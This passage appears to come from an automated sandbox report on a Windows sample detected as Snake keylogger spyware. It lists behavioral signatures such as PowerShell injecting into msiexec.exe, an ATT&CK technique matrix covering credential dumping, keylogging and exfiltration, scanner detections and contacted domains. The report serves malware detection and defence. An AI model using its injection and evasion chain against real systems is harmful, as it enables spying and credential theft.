      Source: powershell.exe, 00000002.00000002.1828484729.00000000056DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeAPI call chain: ExitProcess graph end nodegraph_0-2951
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeAPI call chain: ExitProcess graph end nodegraph_0-3092
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04EA77F9 LdrInitializeThunk,2_2_04EA77F9
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeCode function: 0_2_0040610B GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0040610B
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3A60000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeCode function: 0_2_00405DC3 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405DC3
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation
      1
      DLL Side-Loading
      311
      Process Injection
      11
      Masquerading
      OS Credential Dumping11
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      11
      Encrypted Channel
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Native API
      Boot or Logon Initialization Scripts1
      DLL Side-Loading
      21
      Virtualization/Sandbox Evasion
      LSASS Memory1
      Process Discovery
      Remote Desktop Protocol1
      Clipboard Data
      3
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      PowerShell
      Logon Script (Windows)Logon Script (Windows)311
      Process Injection
      Security Account Manager21
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Obfuscated Files or Information
      NTDS1
      Application Window Discovery
      Distributed Component Object ModelInput Capture14
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Software Packing
      LSA Secrets3
      File and Directory Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain Credentials14
      System Information Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      yMXFgPOdf2.exe74%ReversingLabsWin32.Spyware.Snakekeylogger
      yMXFgPOdf2.exe67%VirustotalBrowse
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens\yMXFgPOdf2.exe74%ReversingLabsWin32.Spyware.Snakekeylogger
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://www.google.com70%Avira URL Cloudsafe
      https://www.google.com770%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      s-part-0017.t-0009.t-msedge.net
      13.107.246.45
      truefalse
        high
        drive.google.com
        142.250.184.238
        truefalse
          high
          drive.usercontent.google.com
          142.250.185.161
          truefalse
            high
            NameSourceMaliciousAntivirus DetectionReputation
            http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1831196151.0000000006158000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000002.00000002.1828484729.0000000005246000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://drive.google.com/dNmsiexec.exe, 00000007.00000003.2478507139.00000000088CB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2444573507.00000000088CB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2317159024.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2329776779.00000000088CC000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://www.google.com7msiexec.exe, 00000007.00000003.2191707284.00000000088C9000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1828484729.0000000005246000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://aka.ms/pscore6lB_qpowershell.exe, 00000002.00000002.1828484729.00000000050F1000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://translate.google.com/translate_a/element.jsmsiexec.exe, 00000007.00000003.2020881269.00000000088C7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1998363215.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2111815111.000000000891F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2605447393.00000000088C5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2157134441.00000000088C9000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.1828484729.0000000005246000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
